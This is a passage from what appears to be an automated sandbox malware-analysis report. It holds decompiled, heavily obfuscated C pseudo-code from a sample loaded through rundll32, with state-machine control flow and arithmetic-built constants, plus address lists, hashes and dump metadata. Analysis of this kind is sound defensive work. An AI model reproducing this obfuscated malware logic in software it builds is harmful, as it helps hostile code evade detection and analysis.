							_t218 = 0xaf66d96;
							continue;
						}
						if(_t218 == 0x4f7449d) {
							_v524 = _v540;
							goto L9;
						}
						if(_t218 == 0x51416c3) {
							E003612A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
							_t209 = E00347677( &_v520, _v604, _v612, _v572);
							_t224 =  *0x36520c; // 0x0
							 *((intOrPtr*)(_t224 + 4)) = _t209;
							L23:
							return _t246;
						}
						if(_t218 != 0x6f2f9f8) {
							goto L20;
						}
						_push(_t218);
						_push(_t218);
						 *0x36520c = E00353512(0x444);
						_t218 = 0xcc58939;
					}
					__eflags = _t218 - 0xbcbad55;
					if(_t218 == 0xbcbad55) {
						E0034E86A();
						_t218 = 0x51416c3;
						goto L20;
					}
					__eflags = _t218 - 0xcc58939;
					if(_t218 == 0xcc58939) {
						_t202 = E0034EB36(_v576, _v584, _t218, _v536);
						_t245 = _t202;
						_t248 =  &(_t248[3]);
						__eflags = _t202;
						if(__eflags == 0) {
							_t218 = 0x4f7449d;
						} else {
							_t216 =  *0x36520c; // 0x0
							 *((intOrPtr*)(_t216 + 0x438)) = 1;
							_t218 = 0xdbc7fda;
						}
						goto L1;
					}
					__eflags = _t218 - 0xdbc7fda;
					if(__eflags != 0) {
						goto L20;
					}
					_t218 = 0x1700698;
					_v524 = _v544;
					goto L1;
					L20:
					__eflags = _t218 - 0xee3620e;
				} while (__eflags != 0);
				goto L23;
			}










































                                                                                                                      0x003470ed
                                                                                                                      0x003470f3
                                                                                                                      0x003470fd
                                                                                                                      0x00347105
                                                                                                                      0x0034710a
                                                                                                                      0x00347112
                                                                                                                      0x0034711a
                                                                                                                      0x0034711f
                                                                                                                      0x00347127
                                                                                                                      0x0034712f
                                                                                                                      0x00347134
                                                                                                                      0x0034713c
                                                                                                                      0x00347144
                                                                                                                      0x0034714c
                                                                                                                      0x00347154
                                                                                                                      0x0034715c
                                                                                                                      0x00347164
                                                                                                                      0x0034716c
                                                                                                                      0x00347174
                                                                                                                      0x0034717c
                                                                                                                      0x0034718e
                                                                                                                      0x00347193
                                                                                                                      0x00347199
                                                                                                                      0x003471a1
                                                                                                                      0x003471a3
                                                                                                                      0x003471a8
                                                                                                                      0x003471b0
                                                                                                                      0x003471b8
                                                                                                                      0x003471c0
                                                                                                                      0x003471c5
                                                                                                                      0x003471cd
                                                                                                                      0x003471d9
                                                                                                                      0x003471de
                                                                                                                      0x003471e4
                                                                                                                      0x003471ec
                                                                                                                      0x003471f4
                                                                                                                      0x00347201
                                                                                                                      0x00347202
                                                                                                                      0x00347206
                                                                                                                      0x0034720e
                                                                                                                      0x00347216
                                                                                                                      0x0034721e
                                                                                                                      0x00347226
                                                                                                                      0x0034722e
                                                                                                                      0x00347236
                                                                                                                      0x0034723e
                                                                                                                      0x00347246
                                                                                                                      0x0034724e
                                                                                                                      0x0034725c
                                                                                                                      0x00347260
                                                                                                                      0x00347268
                                                                                                                      0x00347270
                                                                                                                      0x00347278
                                                                                                                      0x00347280
                                                                                                                      0x00347288
                                                                                                                      0x00347290
                                                                                                                      0x00347298
                                                                                                                      0x003472a0
                                                                                                                      0x003472a5
                                                                                                                      0x003472ad
                                                                                                                      0x003472b5
                                                                                                                      0x003472bd
                                                                                                                      0x003472c5
                                                                                                                      0x003472cd
                                                                                                                      0x003472df
                                                                                                                      0x003472e2
                                                                                                                      0x003472eb
                                                                                                                      0x003472ef
                                                                                                                      0x003472f7
                                                                                                                      0x003472ff
                                                                                                                      0x00347307
                                                                                                                      0x0034730f
                                                                                                                      0x00347317
                                                                                                                      0x0034731f
                                                                                                                      0x00347327
                                                                                                                      0x0034732f
                                                                                                                      0x00347334
                                                                                                                      0x0034733c
                                                                                                                      0x00347344
                                                                                                                      0x0034734c
                                                                                                                      0x00347354
                                                                                                                      0x0034735c
                                                                                                                      0x00347364
                                                                                                                      0x0034736c
                                                                                                                      0x00347371
                                                                                                                      0x00347379
                                                                                                                      0x00347381
                                                                                                                      0x00347389
                                                                                                                      0x00347391
                                                                                                                      0x00347395
                                                                                                                      0x0034739d
                                                                                                                      0x0034739d
                                                                                                                      0x003473a5
                                                                                                                      0x003473a5
                                                                                                                      0x003473a5
                                                                                                                      0x003473a5
                                                                                                                      0x003473a7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003473ad
                                                                                                                      0x00347420
                                                                                                                      0x00347436
                                                                                                                      0x0034743f
                                                                                                                      0x00347444
                                                                                                                      0x00347447
                                                                                                                      0x0034744c
                                                                                                                      0x00347450
                                                                                                                      0x00347451
                                                                                                                      0x00000000
                                                                                                                      0x00347451
                                                                                                                      0x003473b5
                                                                                                                      0x00347416
                                                                                                                      0x0034741b
                                                                                                                      0x00347401
                                                                                                                      0x00347401
                                                                                                                      0x00000000
                                                                                                                      0x00347401
                                                                                                                      0x003473b9
                                                                                                                      0x003473fd
                                                                                                                      0x00000000
                                                                                                                      0x003473fd
                                                                                                                      0x003473c1
                                                                                                                      0x003474e6
                                                                                                                      0x003474fb
                                                                                                                      0x00347500
                                                                                                                      0x00347509
                                                                                                                      0x0034750d
                                                                                                                      0x00347518
                                                                                                                      0x00347518
                                                                                                                      0x003473cd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003473df
                                                                                                                      0x003473e0
                                                                                                                      0x003473ed
                                                                                                                      0x003473f2
                                                                                                                      0x003473f2
                                                                                                                      0x00347459
                                                                                                                      0x0034745f
                                                                                                                      0x003474bd
                                                                                                                      0x003474c2
                                                                                                                      0x00000000
                                                                                                                      0x003474c2
                                                                                                                      0x00347461
                                                                                                                      0x00347467
                                                                                                                      0x00347490
                                                                                                                      0x00347495
                                                                                                                      0x00347497
                                                                                                                      0x0034749a
                                                                                                                      0x0034749c
                                                                                                                      0x003474b6
                                                                                                                      0x0034749e
                                                                                                                      0x0034749e
                                                                                                                      0x003474a6
                                                                                                                      0x003474ac
                                                                                                                      0x003474ac
                                                                                                                      0x00000000
                                                                                                                      0x0034749c
                                                                                                                      0x00347469
                                                                                                                      0x0034746f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00347475
                                                                                                                      0x0034747a
                                                                                                                      0x00000000
                                                                                                                      0x003474c7
                                                                                                                      0x003474c7
                                                                                                                      0x003474c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: 079eded42a865de2cb2ad698981d5914da6a7ca3e19c88312669ce298bf79900
                                                                                                                      • Instruction ID: edfb6e61cf7d766a45f1a6abaeb4012698d6df48cfcba7dcf7f70ab1873b7b5e
                                                                                                                      • Opcode Fuzzy Hash: 079eded42a865de2cb2ad698981d5914da6a7ca3e19c88312669ce298bf79900
                                                                                                                      • Instruction Fuzzy Hash: C5A1327150C3819FD369CF25D48A82BBBF1FBC5758F20891DF6968A260D3B19949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00355040 Relevance: 7.7, Strings: 6, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00355040(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t222;
				signed int _t224;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t261;
				void* _t262;
				signed int* _t264;
				signed int* _t265;

				_t264 =  &_v80;
				_v64 = 0xca2d1a;
				_v64 = _v64 + 0xffff463a;
				_v64 = _v64 + 0xffffa2b5;
				_v64 = _v64 + 0xffffe441;
				_v64 = _v64 ^ 0x00ce8887;
				_v68 = 0xe757b6;
				_t261 = __edx;
				_t227 = __ecx;
				_t262 = 0xd46e588;
				_t229 = 0x7b;
				_v68 = _v68 / _t229;
				_v68 = _v68 | 0x2f3c6c23;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0xe7b70971;
				_v72 = 0xa66d67;
				_v72 = _v72 + 0xffff9e81;
				_v72 = _v72 + 0xffffa01d;
				_v72 = _v72 + 0xd858;
				_v72 = _v72 ^ 0x00aeb203;
				_v76 = 0xda65d9;
				_v76 = _v76 | 0x06c15440;
				_v76 = _v76 + 0x3ac0;
				_t230 = 0x31;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x9dbea6d5;
				_v28 = 0xef7021;
				_v28 = _v28 + 0xc1df;
				_v28 = _v28 ^ 0x38dac4ec;
				_v28 = _v28 ^ 0x38291ca9;
				_v56 = 0xd77e5;
				_v56 = _v56 | 0x9f6ff94e;
				_v56 = _v56 / _t230;
				_v56 = _v56 ^ 0x034debba;
				_v32 = 0x5c0433;
				_t231 = 0x4c;
				_v32 = _v32 / _t231;
				_t232 = 0x38;
				_v32 = _v32 * 9;
				_v32 = _v32 ^ 0x000ec3b0;
				_v60 = 0x6ca766;
				_v60 = _v60 + 0x1f13;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0xc778512f;
				_v12 = 0x6aa94;
				_v12 = _v12 + 0x5212;
				_v12 = _v12 ^ 0x000734b5;
				_v48 = 0xd6268c;
				_v48 = _v48 / _t232;
				_t233 = 0x26;
				_v48 = _v48 / _t233;
				_v48 = _v48 + 0x646;
				_v48 = _v48 ^ 0x000e3e3b;
				_v52 = 0x57df31;
				_t234 = 0x5e;
				_v52 = _v52 / _t234;
				_v52 = _v52 >> 4;
				_v52 = _v52 << 0x10;
				_v52 = _v52 ^ 0x0ef79a5c;
				_v8 = 0x5569b0;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x000ef288;
				_v44 = 0x5fa9ce;
				_v44 = _v44 + 0xffff7bdd;
				_v44 = _v44 << 1;
				_t235 = 0x65;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x000c777c;
				_v36 = 0x515ebf;
				_v36 = _v36 | 0x64797e59;
				_v36 = _v36 ^ 0x4915d5d4;
				_v36 = _v36 ^ 0x2d62d183;
				_v16 = 0xf90c33;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 ^ 0x1c3bb4ce;
				_v80 = 0x303e6a;
				_v80 = _v80 + 0xaf21;
				_v80 = _v80 ^ 0x45872c25;
				_v80 = _v80 + 0xffff3867;
				_v80 = _v80 ^ 0x45bdee21;
				_v20 = 0xb8b4ba;
				_v20 = _v20 + 0x3a99;
				_v20 = _v20 ^ 0x00b083c3;
				_v40 = 0xb582c8;
				_v40 = _v40 + 0x432d;
				_v40 = _v40 | 0xfff7ef9a;
				_v40 = _v40 ^ 0xfff9a351;
				_v24 = 0x3e85d;
				_v24 = _v24 * 0x1b;
				_v24 = _v24 + 0xffffd227;
				_v24 = _v24 ^ 0x006c1bcc;
				_v4 = 0x28c504;
				_v4 = _v4 + 0xffffee75;
				_v4 = _v4 ^ 0x002a9648;
				do {
					while(_t262 != 0x8d90b87) {
						if(_t262 == 0x991fac7) {
							return E0034F88A(_v40, _v24, _v4,  *(_t261 + 0x30));
						}
						if(_t262 == 0xa3f1429) {
							_push(_t235);
							_t224 = E00358D71(_v64, _v68, __eflags, _v72, _v76, _t227);
							_t265 =  &(_t264[4]);
							 *(_t261 + 0x30) = _t224;
							__eflags = _t224;
							if(_t224 != 0) {
								E0034EE05(_v56, _v32, _v60, _t224, _t224);
								_t235 =  *(_t261 + 0x30);
								E0035E713(_t235, _v12, _v48, _v52);
								_t264 =  &(_t265[6]);
								_t262 = 0x8d90b87;
								continue;
							}
						} else {
							if(_t262 == 0xd46e588) {
								_t262 = 0xa3f1429;
								continue;
							} else {
								if(_t262 != 0xf9322b8) {
									goto L14;
								} else {
									_t235 = E00342F34;
									_t224 = E00354EFF(E00342F34, _v36, E00342F34, E00342F34, _v16, _v80, E00342F34, _v20, _t261);
									_t264 =  &(_t264[8]);
									 *(_t261 + 0x24) = _t224;
									if(_t224 == 0) {
										_t262 = 0x991fac7;
										continue;
									}
								}
							}
						}
						return _t224;
						L18:
					}
					_t235 = _v8;
					_t222 = E00352BDE(_t235,  *(_t261 + 0x30), _v44);
					_t264 =  &(_t264[1]);
					 *(_t261 + 0xc) = _t222;
					__eflags = _t222;
					if(__eflags == 0) {
						_t262 = 0x991fac7;
						goto L14;
					} else {
						_t262 = 0xf9322b8;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t262 - 0x74fce14;
				} while (__eflags != 0);
				return _t224;
			}





































                                                                                                                      0x00355040
                                                                                                                      0x00355043
                                                                                                                      0x0035504b
                                                                                                                      0x00355053
                                                                                                                      0x0035505b
                                                                                                                      0x00355063
                                                                                                                      0x0035506b
                                                                                                                      0x0035507b
                                                                                                                      0x0035507d
                                                                                                                      0x00355083
                                                                                                                      0x00355088
                                                                                                                      0x0035508d
                                                                                                                      0x00355093
                                                                                                                      0x0035509b
                                                                                                                      0x003550a0
                                                                                                                      0x003550a8
                                                                                                                      0x003550b0
                                                                                                                      0x003550b8
                                                                                                                      0x003550c0
                                                                                                                      0x003550c8
                                                                                                                      0x003550d0
                                                                                                                      0x003550d8
                                                                                                                      0x003550e0
                                                                                                                      0x003550ed
                                                                                                                      0x003550f0
                                                                                                                      0x003550f4
                                                                                                                      0x003550fc
                                                                                                                      0x00355104
                                                                                                                      0x0035510c
                                                                                                                      0x00355114
                                                                                                                      0x0035511c
                                                                                                                      0x00355124
                                                                                                                      0x00355134
                                                                                                                      0x00355138
                                                                                                                      0x00355140
                                                                                                                      0x0035514c
                                                                                                                      0x00355151
                                                                                                                      0x0035515c
                                                                                                                      0x0035515f
                                                                                                                      0x00355163
                                                                                                                      0x0035516b
                                                                                                                      0x00355173
                                                                                                                      0x00355180
                                                                                                                      0x00355184
                                                                                                                      0x00355189
                                                                                                                      0x00355191
                                                                                                                      0x00355199
                                                                                                                      0x003551a1
                                                                                                                      0x003551a9
                                                                                                                      0x003551b9
                                                                                                                      0x003551c1
                                                                                                                      0x003551c4
                                                                                                                      0x003551c8
                                                                                                                      0x003551d0
                                                                                                                      0x003551d8
                                                                                                                      0x003551e8
                                                                                                                      0x003551ed
                                                                                                                      0x003551f3
                                                                                                                      0x003551fd
                                                                                                                      0x00355202
                                                                                                                      0x0035520a
                                                                                                                      0x00355212
                                                                                                                      0x00355217
                                                                                                                      0x0035521f
                                                                                                                      0x00355227
                                                                                                                      0x0035522f
                                                                                                                      0x00355237
                                                                                                                      0x0035523a
                                                                                                                      0x0035523e
                                                                                                                      0x00355246
                                                                                                                      0x0035524e
                                                                                                                      0x00355256
                                                                                                                      0x0035525e
                                                                                                                      0x00355266
                                                                                                                      0x00355273
                                                                                                                      0x00355277
                                                                                                                      0x0035527f
                                                                                                                      0x00355287
                                                                                                                      0x0035528f
                                                                                                                      0x00355297
                                                                                                                      0x0035529f
                                                                                                                      0x003552a7
                                                                                                                      0x003552af
                                                                                                                      0x003552b7
                                                                                                                      0x003552bf
                                                                                                                      0x003552c7
                                                                                                                      0x003552cf
                                                                                                                      0x003552d7
                                                                                                                      0x003552df
                                                                                                                      0x003552ec
                                                                                                                      0x003552f0
                                                                                                                      0x003552f8
                                                                                                                      0x00355300
                                                                                                                      0x00355308
                                                                                                                      0x00355310
                                                                                                                      0x00355318
                                                                                                                      0x00355318
                                                                                                                      0x00355326
                                                                                                                      0x00000000
                                                                                                                      0x00355425
                                                                                                                      0x00355332
                                                                                                                      0x0035537f
                                                                                                                      0x00355391
                                                                                                                      0x00355396
                                                                                                                      0x00355399
                                                                                                                      0x0035539c
                                                                                                                      0x0035539e
                                                                                                                      0x003553b6
                                                                                                                      0x003553c7
                                                                                                                      0x003553ca
                                                                                                                      0x003553cf
                                                                                                                      0x003553d2
                                                                                                                      0x00000000
                                                                                                                      0x003553d2
                                                                                                                      0x00355334
                                                                                                                      0x0035533a
                                                                                                                      0x00355378
                                                                                                                      0x00000000
                                                                                                                      0x0035533c
                                                                                                                      0x00355342
                                                                                                                      0x00000000
                                                                                                                      0x00355348
                                                                                                                      0x0035535c
                                                                                                                      0x00355361
                                                                                                                      0x00355366
                                                                                                                      0x00355369
                                                                                                                      0x0035536e
                                                                                                                      0x00355374
                                                                                                                      0x00000000
                                                                                                                      0x00355374
                                                                                                                      0x0035536e
                                                                                                                      0x00355342
                                                                                                                      0x0035533a
                                                                                                                      0x0035542d
                                                                                                                      0x00000000
                                                                                                                      0x0035542d
                                                                                                                      0x003553e3
                                                                                                                      0x003553e7
                                                                                                                      0x003553ec
                                                                                                                      0x003553ef
                                                                                                                      0x003553f2
                                                                                                                      0x003553f4
                                                                                                                      0x00355400
                                                                                                                      0x00000000
                                                                                                                      0x003553f6
                                                                                                                      0x003553f6
                                                                                                                      0x00000000
                                                                                                                      0x003553f6
                                                                                                                      0x00000000
                                                                                                                      0x00355402
                                                                                                                      0x00355402
                                                                                                                      0x00355402
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: e028c81bbbb25b330d1a2aa9cb693fe417b136c261e4dc5fa3b273cdf1e3312f
                                                                                                                      • Instruction ID: 2c590a8d84dd21b7734e30a2136e2d3a9d62f8076121ddf9b437d0722e5899be
                                                                                                                      • Opcode Fuzzy Hash: e028c81bbbb25b330d1a2aa9cb693fe417b136c261e4dc5fa3b273cdf1e3312f
                                                                                                                      • Instruction Fuzzy Hash: F7A165B1808781AFD358CF25C48981BFBF1BBC4358F408A1DF99A96260D7B1D9498F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction ID: 507c20c1e61512489ef28f25289f4d37d9bc9ee57db3d69d2177bc050be51aa9
                                                                                                                      • Opcode Fuzzy Hash: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction Fuzzy Hash: 3D21FFB4801320CFFB11DF28EDC56483BA4FB88315F10206AE50D87A71EBB16680AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00352BF6 Relevance: 6.7, Strings: 5, Instructions: 409COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00352BF6() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* _t442;
				intOrPtr _t446;
				intOrPtr _t448;
				signed int _t458;
				signed int _t460;
				void* _t461;
				void* _t492;
				signed int _t502;
				intOrPtr _t503;
				intOrPtr* _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				void* _t515;
				signed int* _t518;
				void* _t521;

				_t518 =  &_v1760;
				_v1576 = 0xf21b90;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t505 = 0x2b;
				asm("stosd");
				_t461 = 0x34076d8;
				asm("stosd");
				_v1580 = 0xbaeef6;
				_v1580 = _v1580 + 0xba3c;
				_v1580 = _v1580 ^ 0x00bba91b;
				_v1660 = 0x2ae6d5;
				_v1660 = _v1660 << 6;
				_v1660 = _v1660 / _t505;
				_v1660 = _v1660 ^ 0x0030dab5;
				_v1716 = 0xb009df;
				_v1716 = _v1716 ^ 0xf6c25862;
				_v1716 = _v1716 + 0xcd46;
				_v1716 = _v1716 + 0x716d;
				_v1716 = _v1716 ^ 0xf6739072;
				_v1588 = 0x61188e;
				_v1588 = _v1588 ^ 0xbe54106a;
				_v1588 = _v1588 ^ 0xbe3508e6;
				_v1600 = 0x5c78c8;
				_v1600 = _v1600 | 0xa4208796;
				_v1600 = _v1600 ^ 0xa47cffde;
				_v1684 = 0xfd831d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 >> 0xc;
				_v1684 = _v1684 ^ 0x0001fb16;
				_v1608 = 0x3a7886;
				_v1608 = _v1608 + 0xffff806f;
				_v1608 = _v1608 ^ 0x003b1c87;
				_v1616 = 0x5dea07;
				_t506 = 9;
				_v1616 = _v1616 * 0x59;
				_v1616 = _v1616 ^ 0x20ad8776;
				_v1708 = 0xdb05ba;
				_v1708 = _v1708 ^ 0x457fa961;
				_v1708 = _v1708 | 0x4dd1de05;
				_v1708 = _v1708 + 0xffff2bcd;
				_v1708 = _v1708 ^ 0x4dffde68;
				_v1740 = 0x5f9fa;
				_v1740 = _v1740 >> 0x10;
				_v1740 = _v1740 * 0x47;
				_v1740 = _v1740 / _t506;
				_v1740 = _v1740 ^ 0x0003f3c1;
				_v1700 = 0xeda1e9;
				_v1700 = _v1700 << 0xb;
				_t507 = 0x4c;
				_v1700 = _v1700 * 0x17;
				_v1700 = _v1700 ^ 0xcc50fc90;
				_v1688 = 0xc376bf;
				_v1688 = _v1688 + 0xffffce34;
				_v1688 = _v1688 << 0xf;
				_v1688 = _v1688 ^ 0xa27d2095;
				_v1736 = 0x77df39;
				_v1736 = _v1736 >> 4;
				_v1736 = _v1736 >> 7;
				_v1736 = _v1736 / _t507;
				_v1736 = _v1736 ^ 0x0006bba1;
				_v1744 = 0xdb3f7a;
				_v1744 = _v1744 << 0xc;
				_t508 = 0x46;
				_v1744 = _v1744 / _t508;
				_t509 = 0x2e;
				_v1744 = _v1744 / _t509;
				_v1744 = _v1744 ^ 0x0009adba;
				_v1620 = 0x28e24f;
				_v1620 = _v1620 << 1;
				_v1620 = _v1620 ^ 0x00586b21;
				_v1720 = 0xedf2ea;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0xd060;
				_v1720 = _v1720 ^ 0x00e1c656;
				_v1728 = 0x3692b9;
				_v1728 = _v1728 + 0xffff0cc0;
				_v1728 = _v1728 ^ 0x15726ff1;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 ^ 0xa3f1c3b7;
				_v1628 = 0xe9d0b6;
				_v1628 = _v1628 + 0xffff0b2c;
				_v1628 = _v1628 ^ 0x00e13fcd;
				_v1672 = 0xb5656;
				_v1672 = _v1672 << 1;
				_t510 = 0x75;
				_v1672 = _v1672 / _t510;
				_v1672 = _v1672 ^ 0x0000c760;
				_v1636 = 0xb446a;
				_t511 = 0x66;
				_v1636 = _v1636 * 0x2c;
				_v1636 = _v1636 ^ 0x01e018a2;
				_v1612 = 0x7754cf;
				_v1612 = _v1612 ^ 0x9195c63c;
				_v1612 = _v1612 ^ 0x91eaa7e8;
				_v1656 = 0x90fdf5;
				_v1656 = _v1656 | 0x8a72400d;
				_v1656 = _v1656 / _t511;
				_v1656 = _v1656 ^ 0x015bbc23;
				_v1664 = 0xea1595;
				_v1664 = _v1664 ^ 0x656fc689;
				_t512 = 0x1d;
				_v1664 = _v1664 / _t512;
				_v1664 = _v1664 ^ 0x0381a839;
				_v1724 = 0x1903df;
				_v1724 = _v1724 ^ 0xd471d85a;
				_v1724 = _v1724 << 9;
				_v1724 = _v1724 + 0xa250;
				_v1724 = _v1724 ^ 0xd1be858e;
				_v1592 = 0x634acd;
				_v1592 = _v1592 >> 1;
				_v1592 = _v1592 ^ 0x0031fc8c;
				_v1624 = 0x214267;
				_v1624 = _v1624 >> 0xe;
				_v1624 = _v1624 ^ 0x000cae4b;
				_v1748 = 0xf70b55;
				_v1748 = _v1748 ^ 0x8376c783;
				_v1748 = _v1748 + 0xffff9546;
				_v1748 = _v1748 ^ 0x30c8a062;
				_v1748 = _v1748 ^ 0xb347cf79;
				_v1644 = 0x4a974c;
				_v1644 = _v1644 + 0xf754;
				_v1644 = _v1644 ^ 0x0044301a;
				_v1756 = 0xfefcd0;
				_v1756 = _v1756 + 0xffff9941;
				_v1756 = _v1756 << 0xc;
				_v1756 = _v1756 + 0x3291;
				_v1756 = _v1756 ^ 0xe96b65aa;
				_v1632 = 0x34bd00;
				_v1632 = _v1632 << 0xd;
				_v1632 = _v1632 ^ 0x97a30bc0;
				_v1676 = 0xf19685;
				_t513 = 0x7b;
				_v1676 = _v1676 * 0x54;
				_v1676 = _v1676 ^ 0x1e84cba5;
				_v1676 = _v1676 ^ 0x51c47a4f;
				_v1652 = 0x3d5ed0;
				_v1652 = _v1652 * 7;
				_v1652 = _v1652 / _t513;
				_v1652 = _v1652 ^ 0x0004a817;
				_v1668 = 0x31208a;
				_v1668 = _v1668 << 3;
				_v1668 = _v1668 + 0x3afc;
				_v1668 = _v1668 ^ 0x0186e9ee;
				_v1692 = 0x9120a;
				_v1692 = _v1692 + 0xffff3905;
				_v1692 = _v1692 ^ 0x12b553f3;
				_v1692 = _v1692 ^ 0x12bb5ad6;
				_v1680 = 0x26d3f8;
				_v1680 = _v1680 << 7;
				_v1680 = _v1680 + 0xa827;
				_v1680 = _v1680 ^ 0x136c77e8;
				_v1584 = 0x751146;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x3a8d2dd0;
				_v1732 = 0x266ad0;
				_v1732 = _v1732 + 0xffffe92f;
				_v1732 = _v1732 | 0xe77a0674;
				_v1732 = _v1732 << 8;
				_v1732 = _v1732 ^ 0x7e56f20f;
				_v1640 = 0xc95fbf;
				_v1640 = _v1640 >> 1;
				_v1640 = _v1640 ^ 0x006563fc;
				_v1752 = 0xe51758;
				_v1752 = _v1752 + 0x7d69;
				_v1752 = _v1752 << 8;
				_v1752 = _v1752 >> 5;
				_v1752 = _v1752 ^ 0x0727d5ea;
				_v1696 = 0x906e7e;
				_t514 = 0x72;
